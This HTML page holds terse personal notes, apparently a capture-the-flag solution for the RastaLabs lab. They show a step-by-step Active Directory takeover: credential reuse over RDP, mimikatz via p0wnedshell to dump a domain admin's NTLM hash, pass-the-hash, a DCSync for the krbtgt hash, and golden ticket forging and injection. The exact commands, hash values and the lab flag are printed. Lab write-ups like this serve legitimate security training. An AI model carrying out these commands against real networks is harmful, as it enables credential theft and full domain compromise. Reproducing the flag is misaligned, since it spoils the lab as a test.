<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>13 flag</title>
</head><body><br/>
using epugh_adm creds, logged in to web01 (10.10.110.10) and from there took rdp of sql01(10.10.122.15) using same creds and then rdp to fs01 with user gopikrishna [local admin]<br/>
<br/>
copy and paste p0wnedshell.exe<br/>
<br/>
run p0wnedshell.exe with admin cmd,<br/>
<br/>
option 4, invoke mimikatz ----&gt; get the ntlm hash of rweston_da [ domain admin ] <br/>
<br/>
rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa<br/>
<br/>
to get rweston_da cmd shell, type this cmd in mimikatz,<br/>
sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa<br/>
<br/>
in the rweston cmd, open p0wnedhsell <br/>
option 10, perform dcsync to get krbtgt hash <br/>
<br/>
krbtgt : 1b6e14bc52b67a2357f7938a8bbceb1b<br/>
<br/>
option 10, generate golden ticket<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
mimikatz(powershell) # kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket<br/>
<br/>
mimikatz(powershell) # kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket<br/>
<br/>
kerberos ticket is in memory, so can do all operations on same cmd<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
pushd \\dc01.rastalabs.local\C$<br/>
<br/>
RASTA{r4574l4b5_ch4mp10n}</body></html>